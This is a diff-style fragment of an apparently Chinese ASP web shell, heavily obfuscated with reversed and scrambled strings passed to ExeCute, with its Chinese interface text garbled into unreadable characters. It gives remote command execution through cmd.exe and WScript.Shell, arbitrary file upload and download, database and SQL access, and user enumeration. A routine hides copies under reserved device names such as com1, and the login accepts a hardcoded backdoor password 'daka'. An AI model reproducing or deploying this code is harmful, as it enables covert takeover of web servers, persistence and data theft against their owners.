+RRS"<tr><td height='21'><a href='?Action=jsp' target='FileFrame'>��JSP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=1' target='FileFrame'>���߼�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=2' target='FileFrame'>����������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=Cplgm&M=3' target='FileFrame'>�������滻</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=DbManager' target='FileFrame'>�����ݿ����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=PageAddToMdb' target='FileFrame'>��������</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Logout' target='_top'>���˳���¼</a></td></tr>"
+End if
+RRS"</table></table>"
+End Function:
+
+
+
+
+
+Sub PageAddToMdb():ExeCute SinfoEn("atePth, cteAthm Dih`~)cteAth(~stueeq R =cteAth`~)thPahe~tt(esquRe= h atePth`0000=1uteOimtTipcr.SerrvSe0`he Tb~MdTodd~a= t Ache tIfn`thPahe(tdboMdTad)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`he Tb~MdomFrseeael~r= t Ache tIfn`thPahe(tckPaun)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`��:�д��ļ�r><bS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ ~~& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`t>Ache=tmenab MdTodd=aueal venddhie=yp tutnp<iS~RR~`n>iopt/oO<FS>��pp=aueal vontiop><ontiop</SO>Fso=fueal vontiop><odthMehe=tmenat ecel<sS~RR~`>~ctlese</S~RR`>~��'ʼ��'��e=luvat miub=spetyt puin <S~RR`��~Ŀ¼ͬ��ľ��SH��H,λ�ļ�db.mSH��H���� ��ע:r><br><bS~RR`>~rmfo</S~RR`/>br:<��)O֧FS(��⿪����>��r/<hS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ b~mdH.HS~\& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`'>����'��e=luvat miub=spetyt puin><cteAthe=am ndbmMroeFasleree=luvan deid=hpetyt puin <S~RR~`¼�¼�Ŀ��ͬHľHSλ�ڼ������ĵ������� ��ע:r><br><bS~RR~`>~rmfo</S~RR",Pos):End Sub:Sub addToMdb(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`lotaCado ar,Stnnco, amrest, nnco, rsm Dig`t~SerdcoReB.ODAD(~ctjeObteeaCrr.veer S =rst Se)`~)amreStB.ODAD(~ctjeObteeaCrr.veer S =amrestt Se`~)ontiecnnCoB.ODAD(~ctjeObteeaCrr.veer S =nncot Se`~)ogalat.COXAD(~ctjeObteeaCrr.veer S =ogalatoCadt Se`~)db.mSH~Hh(atpPMar.veer S &=~ceurSoa at D0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco`Stnncoe atre.CogalatoCadr`Stnncon pe.Onncor`)~gema IntteoneCil fr,harCVah atePth, EDERSTLU CEY KRYMARI P1)0,Y(ITNTDE Int iIda(ateDil Fleab TteeaCr(~tecuxe.Ennco)`pe.Oamrestn`= e yp.Tamrest1` 33,, nnco, a~ateDil~Fn pe.Ors`enTh~ so~f= ) d~hoeteMth(~stueeq RIf`eatr ss, rh,atePthb MdoreFreoTfsm`ls Ee`amrest, rs, thPahe tdbrMFoeeTrsa`Ifd En`selo.Crs`selo.CnnCo`selo.Camrest`nghiot N =rst Se`nghiot N =nncot Se`nghiot N =amrestt Se`nghiot N =ogalatoCadt Se",Pos):End Sub:lI="��$S8~++'PEE#'#INDy&$EU,S8<,<8<'S8<,*{)'w**<88������":execute(lIl(lI)):Function fsoTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("FileL, sysfilesers,  foldlder,theFotem, Dim iist`SH.ldmdb$H$HSH.t = ~leLissysFib$~`se Th= Falath) (thePxistslderE~).FobjectstemOileSying.Fcriptct(~SeObjeCreatrver.If Seen`����!~)���߲�����Ŀ¼������ & ~ ePathrr(thshowE`End If`(thePolder.GetFect~)emObjeSystg.Filiptin(~ScrbjecteateOer.Cr Servder =heFolSet tath)`r.FilFolde= theiles Set fes`ubFolder.SheFols = tolderSet fders`n foltem Iach iFor Eders`treamrs, sath, tem.PMdb ieeForfsoTr`Next`n filtem Iach iFor Ees`<= 0 ~$~) me & em.Na & it, ~$~eListysFilStr(sIf InThen`rs.AddNew`Path,item. Mid(h~) =hePatrs(~t 4)`Path)item.File(dFromm.Loastrea`m.Reastrea~) = ntentileCors(~fd()`rs.Update`End If`Next`= Notiles Set fhing`othins = NolderSet fg` Nothder =heFolSet ting",Pso):End Function:Sub unPack(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`0000=1uteOimtTipcr.SerrvSe0`deoleFth, trnSon cm,eatr sn,on cr,st, ws, rsm Dir`~\& ) .~(~thPaap.MerrvSe= r st~`~)etdSorec.RDBDO~At(ecbjeOatre C =rst Se`m~eatr.SDBDO~At(ecbjeOatre C =amrestt Se)`n~ioctneon.CDBDO~At(ecbjeOatre C =nncot Se)`~;& h atePth& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco~`Stnncon pe.Onncor` 11,, nnco, a~ateDil~Fn pe.Ors`pe.Oamrestn`= e yp.Tamrest1`Eos. rilnt UDof`~)~\, ~)thPahe~ts((revrRStIn, ~)thPahe~ts((rftLe= r deoleFth)`he Tseal F =r)deoleFth& r sts(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIfn`erldFohe t &tr(serldFoteeacr)`Ifd En`s(Eoet.Samrest)`~)ntteoneCil~fs( rteri.Wamrest` 2),h~atePth(~rs& r ste iloFeTav.Samrest`exeNov.Mrst`opLo`selo.Crs`selo.Cnnco`selo.Camrest`nghiot N =wst Se`nghiot N =rst Se`nghiot N =amrestt Se`nghiot N =nncot Se",Pos):End Sub:Sub createFolder(thePath):ExeCute SinfoEn("m Dii`\~ ~h,atePthr(stIn= i )` 0 > ilehi WDo`enThe lsFa= ) i), thPahe(tftLes(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIf`)) 1 - ih,atePtht(ef(LerldFoteeaCr).t~ecbjmOteyseSil.Fngtiipcr~St(ecbjeOatre.CerrvSe`Ifd En`he T~)~\, 1)+ i , thPahe(tid(MtrnS IIfn`\~ ~), 1 + ih,atePthd(Mir(stIn+ i = i )`ls Ee`= i 0`Ifd En`opLo",Pos):End Sub:Sub saTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("stLileFiys sr,deoleFth, emitm Di`b$ldH.HSb$mdH.HS~$= t iseLilsFsy~`h)atePthe(acSpmeNaX.sa= r deoleFtht Se`mste.IerldFohe tInm te ichEar Fo`enThe ru T =erldFoIsm.te iIf`amrest, rs, thPam.te idbrMFoeeTrsa`ls Ee`enTh0 =  <~)~$& e am.Nemit& ~ ~$, stLileFiys(strnS IIf`Nedd.Arsw` 4h,at.Pemitd(Mi= ) h~atePth(~rs)`h)at.Pemite(ilmFrodFoa.Lamrest`d(ea.Ramrest= ) t~enntColefi(~rs)`atpd.Urse`Ifd En`Ifd En`xtNe`inthNo= r deoleFtht Seg",Pos):End Sub:Function Course():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='600widthable br><tSI=~<~`></tr��</tdͳ�û����nu'>ϵr='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~` nextesumeror ron er`NT://(~Winbject getObj inach ofor e.~)`err.clear`e=~~ rtTypJ.Staif OBthen`&~<trSI=SI>~`&nbspFF~~>#FFFFor=~~bgcol20~~ ht=~~ heig&~<tdSI=SI;~`&obj.SI=SIName`>&nbsFFF~~~#FFFlor=~ bgcod><td&~</tSI=SIp;~ `��(��)~&~ϵͳ��SI=SI`d></t&~</tSI=SIr>~`d></tp;</t>&nbs~~2~~span=~ colFFFF~~~#FFolor=~ bgc~~20~ight=td he<tr><SI0=~r>~ `end if`x=~�Զ�hen le=2 trtTypJ.Staif OB~`x=~�ֶ�hen le=3 trtTypJ.Staif OB~`x=~����hen le=4 trtTypJ.Staif OB~`pe=2 artTyBJ.Stand Owin~ ))<>~h,4,3j.patid(obase(mif LCthen`></tr></td/fontth&~<bj.pap;~&o>&nbsF0000or=#Ft col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI1&~<SI1=S>~`else`></tr></td/fontth&~<bj.pap;~&o>&nbs399FFor=#3t col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI2&~<SI2=S>~`end if`next`</tabSI2&~&SI1&I&SI0RRS Sle>~",Pso):End Function:Function ServerInfo():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='80%widthable br><tSI=~<~`></trϢ</td���������nu'>��r='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~`td></)&~</NAME~RVER_s(~SEiableerVar.servquest>~&reFFFF'='#FFcolortd bg/td><bsp;<F'>&nFFFFFor='#bgcol><td ��</td'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`FFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>������IPFFF'>'#FFFolor=' bgc='200width'20' ight=td heer'><'centlign=<tr aank'>='_blargetrm' t'ipfoname=asp' ndex.com/ip138.www.itp://n='htactiopost thod=rm me&~<foSI=SI~`/form/tr></td><'2'><alue=on' v'actiname=den' ='hid typeinput��ѯ'><lue='t' vasubmiype='put t> <in~)&~'_ADDRLOCALles(~ariabrverVst.SeRequee='~& valu='15' size='ip' nametext'ype='put t&~<inSI=SI>~`</tr></td>nbsp;ow&~&'>~&nFFFFFr='#Fgcolo<td b</td>nbsp;FF'>&#FFFFlor=' bgcod><tdʱ��</t'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI~`></tr~</tdRS~)&CESSOF_PROBER_O(~NUMablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>CPU����'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`d></t&~</t~OS~)bles(Variaerverest.S&RequFF'>~#FFFFlor=' bgcod><tdp;</t>&nbsFFFF'='#FFcolortd bg/td><����ϵͳ<'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SIr>~`></tr~</tdRE~)&OFTWAVER_S(~SERablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>�������汾'>WEBFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`=0 ToFor i 13`td></)&~</t(i,2>~&So=leftalignFFF' '#FFFolor=d bgctd><t)&~</t(i,1>~&SoFFFF'='#FFcolortd bg/td><0)&~<ot(i,'>~&SFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`Next`RRS SI",Pso):End Function:Function DownFile(Path):ExeCute SinfoEn("arle.CseonspRe`)),0(6ot(SctjeObteeaCr= M OSt Se`enOpM.OS` 1 =peTyM.OS`at PleFiomFradLoM.OSh`)+\~,~thpav(Retrns=Isz1`z),sthpad(Mi& ~ e=amenil ft;enhmactt~a, n~ioitosspDit-enntCo ~eradHedd.AseonspRe`iz.SSM O~,thngLet-enntCo ~eradHedd.AseonspRee`8~F-UT ~ =etrsha.CseonspRe`amrestt-teocn/ioaticplap ~ =peTyntteon.CseonspRe~`ea.RSM OteriyWarin.BseonspRed`shlu.FseonspRe`osClM.OSe`inthNo= M OSt Seg",Pos):End Function:Function HTMLEncode(S):if not isnull(S) then:S= replace(S,">","&gt;"):S=replace(S,"<","&lt;"):S=replace(S,CHR(39),"&#39;"):S=replace(S,CHR(34),"&quot;"):S=replace(S,CHR(20),"&nbsp;"):HTMLEncode=S:end if:End Function:sub hiddenshell
+fpath=request.servervariables("path_translated"):set fso=server.createobject("scripting.filesystemobject"):pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9":rndpex=split(pex,"|")(rndnumber(0,17)):session("seljw")="":filepath1=server.mappath("."):filename1=right(fpath,len(fpath)-instrrev(fpath,"\")):url=request.servervariables("url"):url=left(url,instrrev(url,"/"))&rndpex&"."&filename1:fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1:set fso=nothing:rrs "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub:Function UpFile():
+If Request("Action2")="Post" Then
+Set U=new UPC : Set F=U.UA("LocalFile")
+UName=U.form("ToPath")
+If UName="" Or F.FileSize=0 then
+SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+Else
+F.SaveAs UName
+If Err.number=0 Then
+SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+End if
+End If
+Set F=nothing:Set U=nothing
+SI=SI&BackUrl
+RRS SI
+ShowErr()
+Response.End
+End If
+SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+SI=SI&"<tr><td>"
+SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\13cmd.exe")&"' size='40'>"
+SI=SI&" <input name='LocalFile' type='file'size='25'>"
+SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+SI=SI&"</td></tr></form></table>"
+RRS SI:RRS ""&copyurl&""
+End Function::Function Cmd1Shell():ExeCute SinfoEn("checked=~ checked~`t(~SPeques) = RPath~Shellion(~ Sess Then)<>~~(~SP~questIf Re~)`ath~)hellPon(~SSessiPath=Shell`md.ex = ~clPath Shel Thenth=~~ellPaif She~`heckehen ces~ t)<>~yript~(~wscquestif Red=~~`cmd~)est(~ RequCmd =n Def~ The~)<>~(~cmdquestIf Re`st'>~d='pomethoform SI=~<`bsp;~sp;&n'>&nbh:70%'widttyle=&~' SlPath&Shelue='~' vale='SPt nam<inpuLL·����&~SHESI=SI`hell~ipt.S>WScrked&~&checyes'~lue='t' vascripme='wx' naeckboe='chc typlass=put c&~<inSI=SI`440;'ight:0%;heth:10='widStylearea <text'ִ��'>alue=it' v'submtype=nput '> <iCmd&~~&Deflue='%' vath:92='widStylecmd' ame='put n&~<inSI=SI>~`~ The~)<>~(~cmd.FormquestIf Ren`s~ th)=~yeript~(~wsc.Formquestif Reen`Sot(1ject(ateObM=CreSet C,0))`~&Def~ /c Path&Shellexec(D=CM.Set DCmd)`eadalout.rD.stdaaa=Dl`SI=SI&aaa`else` Nextesumeror ROn Er`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`bjectstemOileSying.Fcriptct(~SeObjeCreatrver.so=SeSet f~)`md.txth(~cmapparver. = sepFileszTemt~)` 0, TFile,zTemp~ & s ~ > Cmd && Def/c ~ th&~ ellPan (Shws.RuCall rue)`ject~temObleSysng.Firiptit(~ScObjecreates = CSet f)`se, 0, Falle, 1empFi (szTtFileenTexfs.Opcx = FilelSet o)`.Readlelcxe(oFiEncod.HTMLerveraaa=SAll)`lcx.CoFilelose`, TrupFileszTemFile(eletefso.DCall e)`SI=SI&aaa`end if`End If`></fotarea</tex13)&~&chr(SI=SIrm>~`RRS SI",Pso):End Function:ExeCute SinfoEn("ioctun Fnd:EtrwSne= f iner:SxtNe):os P -618329 ( &os+P)) 1i,, trtsged(Mic(As& r Stew n =trwSne):trtsgen(Leo  T 1 = ior:FtrwSne,  iim:Ds)Po, trtsgef(iner SontincFun",Pos):Function CreateMdb(Path):ExeCute SinfoEn(">~br><br~<I= S`) 0)2,t(Sot(ecbjeOatre C = Cet S`thPa& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe(atre.C C)`nghiot N = Cet S`he T=0ermbnur.Erf  In`��!����~��& h at P &SI= I  S~` Ind Ef`rlkUac&BSII= S ` SRS RI",Pos):End function:Function CompactMdb(Path):ExeCute SinfoEn("enTh) ,1(0ot Sot NIf`)),0(3ot(SctjeObteeaCrC=t Se `at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.h`inthNoC=t Seg`seEl`)),1(0ot(SctjeObteeaCrO=FSt Se`enTh) thPas(stxieEil.FSO FIf`)),0(3ot(SctjeObteeaCrC=t Se `k~ba~_h&at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.`inthNoC=t Seg`at PleFiteleDeO.FSh`at,Pk~ba~_h&at PleFiveMoO.FSh`seEl`>~erntce</�֣��з�~ûh&at&P��~����r><br><br><br>teen<c=~SI `=1ermbnur.Er`Ifd En`inthNoO=FSt Seg`Ifd En`enTh0 r=beum.nrr EIf`>~erntce</��������~ѹh&at&P��~����r><br><br><br>teen<c=~SI`Ifd En`UrckBaI&=SSIl`SIS RR",Pos):End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center><h2>Fuck you,Get out!!</h2><br><a href='javascript:history.back()'>����</a></center>"
+end if
+else
+si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href="&blogurl&" target=_blank>"&mmname&"</a><hr><FORM Action='"&URL&"' method=Post> <INPUT type=Password name=Pass size=22>&nbsp;<input type=submit value=Login><hr><br>"&bottomad&"</div></center>"
+if instr(SI,SIC)<>0 then rrs sI
+end if
+response.end
+end if
+Function DbManager():ExeCute SinfoEn("tr~))~SqlSForm(uest.m(Reqr=TriSqlSt`DbStrorm(~est.F=RequDbStr~)`ing='lpadd' celng='0spaci cellr='0'borde'650'idth=ble w&~<taSI=SI0'>~`on='' actipost'hod='' metbFormme='Drm na&~<foSI=SI>~`�Ӵ�:</;���ݿ���&nbsp27'> ght='' hei='100width><td &~<trSI=SItd>~`/td>~~~~><bStr&~~~&Dalue=70' vdth:4e='wi stylbStr'me='Dut na><inp&~<tdSI=SI`ption����</occesse=0>A valuptionon><o/opti�Ӵ�ʾ��<=-1>��valuetion '><opalue)ex].vedIndelectons[s(optiDbStr Fulleturnge='rnchantn' o'StrBname=lect '><seentergn='c' alih='60 widt&~<tdSI=SI>~`ption����</o3>DSNalue=ion v><optption����</oMySqlue=2>n valoptioion><</optSql����=1>Msvaluetion &~<opSI=SI>~`tion>��</op5>������alue=ion v><optption����</o=4>��ʾvaluetion n><opoptio��--</-SQL��=-1>-valuetion &~<opSI=SI~`ion>~</opt>�����ݱ�lue=8on va<optition>��</op7>�޸���alue=ion v><optption����</o=6>ɾ��valuetion &~<opSI=SI`ption�ֶ�</o11>ɾ��alue=ion v><optption�ֶ�</o10>����alue=ion v><optption�ݱ�</o=9>ɾ��valuetion &~<opSI=SI>~`></tr></tdelectn></soptioȫ��ʾ</=12>��valuetion &~<opSI=SI>~`lue='n' vahiddeype='ge' te='Pat nam<inpuger'>bManaue='D' validdenpe='hn' tyActioame='put n&~<inSI=SI1'>~`:</tdL��������sp;SQ'>&nbt='30heigh><td &~<trSI=SI>~`></tdr&~~~SqlSt=~~~&value470' idth:le='w' styqlStrme='Sut na><inp&~<tdSI=SI>~`/td>~()'><Checkrn Db'retulick=' once='ִ�� valubmit'e='Su' namubmitpe='sut ty><inpnter'n='ce alig&~<tdSI=SI`pan>~'></s='abcan ide><sp/tablorm><r></f&~</tSI=SI`I:SI=RRS S~~`0 Thetr)>4n(DbSIf Len`(5,0)t(SotObjecreateonn=CSet C)`DbStrOpen Conn.`ma(20nSchen.Opes=ConSet R) `r>��</d>��<bC'><tCCCCCor='#Bgcol'25' ight=tr heble><&~<taSI=SItd>~`veFirRs.Most `ot Rsile NDo Wh.Eof`E~ th~TABLPE~)=LE_TY(~TABIf Rsen`_NAMETABLE=Rs(~TName~)`a><brl ]</>[ de~,1)'e&~]~&TNamLE [~P TAB~~DROlStr(ullSqipt:Fvascrf='jaa hreter><n=cen alig&~<tdSI=SI>~`</td>~</a>Name&'>~&T~~,1)me&~]~&TNaROM [T * FSELECtr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI~`End If `veNexRs.Mot `Loop `s=NotSet Rhing`able>r></t&~</tSI=SI~`I:SI=RRS S~~`10 ThStr)>n(SqlIf Leen`ct~ t~sele,6))=qlStreft(Sase(LIf LChen`qlStr�䣺~&S&~ִ����SI=SI`ordseb.Rec~Adodject(ateObs=CreSet Rt~)`Conn,lStr,en SqRs.op1,1`ds.Co.FielFN=Rsunt`rdCou.RecoRC=Rsnt`geSizRs.Pae=20`ageSi=Rs.PCountze`Count.PagePN=Rs`age~)st(~PrequePage=`g(Page=Clnn Pag~ Thege<>~If Pae)` Page Thenage=0 Or Pge=~~If Pa=1` Page Thenge>PNIf Pa=PN`=PageepagesolutRs.abThen ge>1 If Pa`td></ccc><=#ccccolor25 bgight=tr heble><&~<taSI=SItd>~` FN-1=0 toFor n`em(n)ds.It.Fielld=RsSet F`e&~</d.Nam>~&Flnter'n='ce alig&~<tdSI=SItd>~`thingld=noSet F`Next`&~</tSI=SIr>~`Count And .Bof)or Rs.Eof ot(Rsile NDo Wh>0`=CounCountt-1`EFEFEor=~#BgcolF~`t></t</fongs'>xngdine='wit fac><foncccccor=#cbgcol><td &~<trSI=SId>~` FN-1=0 ToFor i`~:EndFEFEFr=~#Egcololse:BF5~:E#F5F5lor=~:Bgco ThenEFEF~=~#EFcolorIf Bg if`=1 ThIf RCen`Rs(i)code(TMLEnnfo=H ColI)`Else`,50))Rs(i)Left(code(TMLEnnfo=H ColI`End If`&~</tlInfo>~&Color&~&Bgcolor=~ bgco&~<tdSI=SId>~`Next`&~</tSI=SIr>~`veNexRs.Mot`Loop`I:SI=RRS S~~`lStr)de(SqlEnCor=HtmSqlSt`&~/~&&Page;ҳ�룺~&nbsp&RC&~��¼����~nter>gn=ce~ aliFN+1&an=~&colsp><td &~<trSI=SIPN`>1 ThIf PNen`a>&nb��һҳ</&~)'>age-1~,~&Ptr&~~&SqlSr(~~~SqlSt:Fullcriptjavasref=';<a h&nbspҳ</a>1)'>��&~~~,qlStr~~~&SlStr(ullSqipt:Fvascrf='jaa hrebsp;<sp;&n&~&nbSI=SIsp;~`End iSp=1:Else:ge-8:Sp=PaThen:ge>8 If Paf`o Sp+=Sp TFor i8`it Foen ExPN ThIf i>r`Page If i=Then`nbsp;&i&~&SI=SI~`Else`&nbsp~</a>>~&i&i&~)'~~,~&Str&~~&Sqltr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI;~`End If`Next`βҳ</a&~)'>,~&PNr&~~~SqlSt(~~~&qlStrFullSript:avascef='j<a hrnbsp;</a>&'>��һҳ+1&~)&Page~~~,~lStr&~~&SqStr(~llSqlpt:Fuascri='jav hrefsp;<a&~&nbSI=SI>~`End If`able>r></td></t'></tFEFEFr='#E colo&~<hrSI=SI~`=Nothet Rsose:SRs.Cling`I:SI=RRS S~~`Else `lStr)te(SqExecuConn.`SqlSt��䣺~&&~SQLSI=SIr`End If`I:SI=RRS S~~`End If`CloseConn.`othinonn=NSet Cg`End If",Pso):End Function:Dim T1:Function EnCode(ObjStr,ObjPos):ExeCuTe Fun(")soPjbO doM rtSneL,rtSjbO(thgiR&rtSpmT=edoCnE:txeN:rtSpmT&)soPjbO,1+soPjbO*i,rtSjbO(diM=rtSpmT:1-)soPjbO/rtSneL(tnI oT 0=i roF:)rtSjbO(neL=rtSneL:rtSneL,i,rtSpmT,rtSweN miD"):End Function:Class UPC:Dim D1,D2:Public Function Form(F):F=lcase(F):If D1.exists(F) then:Form=D1(F):else:Form="":end if:End Function:Public Function UA(F):F=lcase(F):If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if:End Function:Private Sub Class_Initialize:Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName:set D1=CreateObject(Sot(4,0)):if Request.TotalBytes<1 then Exit Sub
+  set T1=CreateObject(Sot(6,0)):T1.Type=1:T1.Mode=3:T1.Open:T1.Write Request.BinaryRead(Request.TotalBytes):T1.Position=0:TDa=T1.Read:DStart=1:DEnd=LenB(TDa):set D2=CreateObject(Sot(4,0)):vbCrlf=chrB(13)&chrB(10):set T2=CreateObject(Sot(6,0)):TSt=MidB(TDa,1,InStrB(DStart,TDa,vbCrlf)-1):TLen=LenB(TSt):DStart=DStart+TLen+1:while (DStart+10)<DEnd:DIEnd=InStrB(DStart,TDa,vbCrlf&vbCrlf)+3:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DStart:T1.CopyTo T2,DIEnd-DStart:T2.Position=0:T2.Type=2:T2.Charset="gb2312":TIn=T2.ReadText:T2.Close:DStart=InStrB(DIEnd,TDa,TSt):FStart=InStr(22,TIn,"name=""",1)+6:FEnd=InStr(FStart,TIn,"""",1):UpName=lcase(Mid(TIn,FStart,FEnd-FStart)):if InStr (45,TIn,"filename=""",1)>0 then
+  set TFL=new FIF:FStart=InStr(FEnd,TIn,"filename=""",1)+10:FEnd=InStr(FStart,TIn,"""",1):FStart=InStr(FEnd,TIn,"Content-Type: ",1)+14:FEnd=InStr(FStart,TIn,vbCr):TFL.FileStart=DIEnd:TFL.FileSize=DStart-DIEnd-3:if not D2.Exists(UpName) then:D2.add UpName,TFL:end if
+  else:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DIEnd:T1.CopyTo T2,DStart-DIEnd-3:T2.Position = 0:T2.Type = 2:T2.Charset ="gb2312":SFV = T2.ReadText:T2.Close:if D1.Exists(UpName) then:D1(UpName)=D1(UpName)&","&SFV:else:D1.Add UpName,SFV:end if:end if:DStart=DStart+TLen+1:wend:TDa="":set T2=nothing:End Sub:Private Sub Class_Terminate:if Request.TotalBytes>0 then:D1.RemoveAll:D2.RemoveAll:set D1=nothing:set D2=nothing:T1.Close:set T1 =nothing:end if:End Sub:End Class:Function SinfoEn(ObjStr,ObjPos):ExeCuTe Fun(")2-)nEofniS(neL,nEofniS(tfeL=nEofniS:txeN:fLrCbv&)soPjbO,)i(rtSweN(edoCnE&nEofniS=nEofniS:)rtSweN(dnuoBU oT 0=i roF:)|`|,rtSjbO(tilpS=rtSweN:)||||,|~|,rtSjbO(ecalpeR=rtSjbO"):End Function:Class FIF:dim FileSize,FileStart:Private Sub Class_Initialize:FileSize=0:FileStart=0:End Sub:Public function SaveAs(F)
+  dim T3:SaveAs=true:if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(Sot(6,0)):T3.Mode=3:T3.Type=1:T3.Open:T1.position=FileStart:T1.copyto T3,FileSize:T3.SaveToFile F,2:T3.Close:set T3=nothing:SaveAs=false:end function:End Class:Function Fun(ShiSanObjstr):ShiSanObjstr=Replace(ShiSanObjstr,"|",""""):For ShiSanI=1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr,ShiSanI,1)<>"!"Then:ShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&ShiSanNewStr:Else:ShiSanNewStr=vbCrLf&ShiSanNewStr:End If:Next:Fun = ShiSanNewStr:End Function:Class LBF:Dim CF:Private Sub Class_Initialize:SET CF=CreateObject(Sot(0,0)):End Sub:Private Sub Class_Terminate:Set CF=Nothing:End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>�����ش��� ("&D.DriveLetter&":)</a></td></tr>" 
+Next
+End Function
